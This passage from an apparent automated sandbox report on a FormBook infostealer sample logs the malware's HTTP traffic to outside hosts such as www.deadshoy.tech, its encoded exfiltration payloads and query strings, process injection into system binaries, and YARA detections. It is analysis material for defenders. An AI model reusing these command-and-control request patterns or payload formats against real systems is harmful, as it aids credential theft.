                                                      Dec 13, 2024 13:19:19.611952066 CET4944OUTData Raw: 74 59 58 70 47 6e 4c 43 6f 6a 47 61 30 4c 51 43 45 72 72 74 4f 74 36 6d 76 73 38 6b 59 2b 47 34 41 79 70 73 59 2f 31 55 2b 47 2b 51 37 6e 4d 4f 4e 36 48 4b 55 57 54 4b 2b 6d 47 6c 44 66 7a 45 65 5a 53 66 41 48 66 51 4f 53 6a 59 4c 59 72 66 36 4b
                                                      Data Ascii: tYXpGnLCojGa0LQCErrtOt6mvs8kY+G4AypsY/1U+G+Q7nMON6HKUWTK+mGlDfzEeZSfAHfQOSjYLYrf6KlIQ50+LzMsl6zTaUxJVYwdbIb3gpM9ObJhKrBEFqnpk8EW/mBveGhO9enA7F56EW6AHrXxmMvMPJA6V7+zy46lX0TUk7uAoMuFBEABuVHyw/mlXuJ6U2AYGUhaTe2jhzmjgRsUZywRsa2HH+hZRQeUY/mrVI/H2W7
                                                      Dec 13, 2024 13:19:19.612026930 CET4944OUTData Raw: 47 54 6a 79 73 4c 4d 70 78 35 2b 51 67 36 4e 31 79 4d 77 6c 56 39 58 37 76 4f 50 49 7a 34 62 73 47 30 39 52 52 4d 53 39 4c 2f 49 30 5a 64 66 5a 58 4d 77 31 6f 53 65 43 32 56 2f 4b 78 73 69 74 55 5a 76 44 46 79 4f 76 6f 75 72 48 79 39 4c 70 56 30
                                                      Data Ascii: GTjysLMpx5+Qg6N1yMwlV9X7vOPIz4bsG09RRMS9L/I0ZdfZXMw1oSeC2V/KxsitUZvDFyOvourHy9LpV01uUk20FdK8BH7LBy6G1aqGCGGYmqxfvVTcvxNmKr6RZ3j0GRYBrctXHTzfv+GVcqx2QSWdSBqigFick2um5Ftpxy3Tpl3p2gTJM9uKPeheSlSFrSKuR9MRXEn4BJNexVW91P8P4EnjHEPNbm3RQlLbda87aAcKXOn
                                                      Dec 13, 2024 13:19:19.612180948 CET2472OUTData Raw: 42 59 6d 6a 55 44 31 64 4d 67 6d 41 78 48 6f 4f 70 2f 35 4c 38 58 6d 4a 57 41 67 51 48 67 55 6d 63 69 63 33 35 50 4c 50 4c 62 2b 39 34 4c 30 59 50 58 77 52 36 6d 48 6e 4b 61 74 59 71 77 56 63 2b 65 4a 6a 4b 6a 44 68 64 4f 6e 35 66 33 6a 6f 54 75
                                                      Data Ascii: BYmjUD1dMgmAxHoOp/5L8XmJWAgQHgUmcic35PLPLb+94L0YPXwR6mHnKatYqwVc+eJjKjDhdOn5f3joTuzIVTCH8jGpP2QFpaKwkbJzMYPyTlvtQsCRJaIZ1a1HyRJRAfpErIO76Ptu67iNO5k7ndNX4MMfowFfVWgoCNenCgie4G2ClINKNstMP2NdkvibNgyMuTv7b7FuWBR5f+SmH6vbGdMnRue8nRr7UBDFXb8j+2aOQWH
                                                      Dec 13, 2024 13:19:19.612238884 CET4944OUTData Raw: 53 47 67 4a 57 35 2f 4c 6d 65 4d 36 48 52 57 4e 34 45 70 68 41 30 38 77 46 31 41 49 52 65 58 57 6a 2b 71 75 57 43 4e 46 34 4a 2f 71 2f 63 71 4e 79 35 4c 35 68 45 41 79 31 69 4c 30 57 58 7a 64 65 61 41 66 4b 31 77 44 37 32 62 62 41 39 4a 6f 31 38
                                                      Data Ascii: SGgJW5/LmeM6HRWN4EphA08wF1AIReXWj+quWCNF4J/q/cqNy5L5hEAy1iL0WXzdeaAfK1wD72bbA9Jo18ZUytAgpeg34b9eoCPx9D3ctMnLrmY/B0RJLkjBE1P1ysxVppjbjMhcCSqyKn8lTtf4kpd+9JoasSLau1UC82k6EirVKX0nrjLBvihS+P/vpzg66am9R2XAa4u5fOQGufFGxdoJiu2CevJZKMxOfw6xocRPU9mrwK0
                                                      Dec 13, 2024 13:19:19.612441063 CET7416OUTData Raw: 67 61 54 53 35 6e 6f 61 66 69 4f 59 30 2b 4e 58 49 4c 33 64 66 61 50 50 34 54 4c 51 72 4e 51 49 6f 58 5a 49 47 49 6e 59 50 66 65 30 43 74 47 4f 59 74 72 6c 4d 36 53 39 4c 4a 55 2f 6b 53 39 62 77 48 77 33 62 36 46 42 4b 41 7a 61 78 68 7a 32 48 57
                                                      Data Ascii: gaTS5noafiOY0+NXIL3dfaPP4TLQrNQIoXZIGInYPfe0CtGOYtrlM6S9LJU/kS9bwHw3b6FBKAzaxhz2HWrerm/4SaK4MXgz9roz/i9NLri1BhhgxzZM8xQuJvxQKVrQy7EUHc1xC/pMDKP7QOQNuVSbX9ZV+x5MlGJ5L6wn74qAyzlFUCjV0gp6ry5umcIw6R3W9oQl0lsFWXf+50IM08zrMLTIpgP0akDdDvkiYH0Z2H2+7du
                                                      Dec 13, 2024 13:19:19.732019901 CET4944OUTData Raw: 4a 69 6f 34 4b 54 55 76 42 44 39 39 44 67 6d 38 69 33 4d 57 32 6e 73 4f 2f 62 4f 57 37 67 2b 63 6d 52 74 78 39 74 36 67 4a 2f 77 6c 6c 4d 71 44 59 64 6d 57 61 63 68 76 52 7a 69 43 76 49 61 45 33 68 70 52 73 4b 42 41 35 69 50 41 4c 2b 73 4e 74 4a
                                                      Data Ascii: Jio4KTUvBD99Dgm8i3MW2nsO/bOW7g+cmRtx9t6gJ/wllMqDYdmWachvRziCvIaE3hpRsKBA5iPAL+sNtJjEZSVufPn5pkzJho4n2vxz7Jy+voDcLKslgvwnAx0sx6iQ6wYkLhbYR4So3y+GIdGwZhARGB/PNZayu4KRg4NzZelS4/dHMLWyDoOmQCtKndUz+7TFR3vyt/Ih8vb4dywlof2taEiQc1g1Qa5fYkoyCSFmrYh2R9N
                                                      Dec 13, 2024 13:19:19.732157946 CET3677OUTData Raw: 4f 47 48 51 6e 51 61 38 51 51 6c 53 78 65 35 62 4b 67 71 62 62 6d 55 2b 79 2f 6f 30 75 51 50 30 30 48 4d 68 36 41 79 70 38 43 4a 6e 74 48 67 53 79 68 4a 54 65 30 77 6b 4a 31 61 4d 2b 45 71 42 73 48 39 73 45 38 5a 6c 38 4e 6d 63 37 78 50 49 45 49
                                                      Data Ascii: OGHQnQa8QQlSxe5bKgqbbmU+y/o0uQP00HMh6Ayp8CJntHgSyhJTe0wkJ1aM+EqBsH9sE8Zl8Nmc7xPIEItykzo5m0f22/dQQki6DK3Wy3uY5B8H+yvtMRzzFoIIxvl062F/LMkYXa/UB178zTqjZ8TJ17dB6rLecrmiLKIn/e4MQOSdQCfd3JcG4kaevQamfVkjutRbIsE7U1D9Mibgh0rkNRzTgQcW3bVTN6QQzb19xrlslMB
                                                      Dec 13, 2024 13:19:20.875353098 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:20 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1118
                                                      x-request-id: 8e384c94-ebd8-40f7-8c82-65668e45634a
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                      set-cookie: parking_session=8e384c94-ebd8-40f7-8c82-65668e45634a; expires=Fri, 13 Dec 2024 12:34:20 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:20.875376940 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGUzODRjOTQtZWJkOC00MGY3LThjODItNjU2NjhlNDU2MzRhIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.2449803199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:22.728226900 CET441OUTGET /0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.deadshoy.tech
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:19:23.813772917 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:22 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1450
                                                      x-request-id: 71cb848c-7646-4c1e-a967-430c26fe6609
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fgoPHtm/QramMV3RGv+U5R9VJq2aSu1vJCQ1epOx9iMZ7ZzabfbSCsa0SkckQacB2sa4NC85pAb6vugaRMjWZg==
                                                      set-cookie: parking_session=71cb848c-7646-4c1e-a967-430c26fe6609; expires=Fri, 13 Dec 2024 12:34:23 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 67 6f 50 48 74 6d 2f 51 72 61 6d 4d 56 33 52 47 76 2b 55 35 52 39 56 4a 71 32 61 53 75 31 76 4a 43 51 31 65 70 4f 78 39 69 4d 5a 37 5a 7a 61 62 66 62 53 43 73 61 30 53 6b 63 6b 51 61 63 42 32 73 61 34 4e 43 38 35 70 41 62 36 76 75 67 61 52 4d 6a 57 5a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fgoPHtm/QramMV3RGv+U5R9VJq2aSu1vJCQ1epOx9iMZ7ZzabfbSCsa0SkckQacB2sa4NC85pAb6vugaRMjWZg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:23.813800097 CET903INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzFjYjg0OGMtNzY0Ni00YzFlLWE5NjctNDMwYzI2ZmU2NjA5IiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:07:17:18
                                                      Start date:13/12/2024
                                                      Path:C:\Users\user\Desktop\Payment Copy #190922-001.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Payment Copy #190922-001.exe"
                                                      Imagebase:0x10000
                                                      File size:1'201'664 bytes
                                                      MD5 hash:6AD492E20A37CB8AE67231FA9059DF17
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:07:17:20
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Payment Copy #190922-001.exe"
                                                      Imagebase:0x100000
                                                      File size:48'096 bytes
                                                      MD5 hash:B96D1C078A724E31B6F98CDB999E47F6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:07:17:49
                                                      Start date:13/12/2024
                                                      Path:C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe"
                                                      Imagebase:0x3a0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:15
                                                      Start time:07:17:51
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\SysWOW64\xwizard.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                      Imagebase:0xb20000
                                                      File size:64'512 bytes
                                                      MD5 hash:CE6B6D39FDAB5FB8D87953BAEB662132
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:22
                                                      Start time:07:18:16
                                                      Start date:13/12/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6e8040000
                                                      File size:671'808 bytes
                                                      MD5 hash:4E82C81BC54B7858AA507CA58D0E3FA2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Disassembly

                                                      No disassembly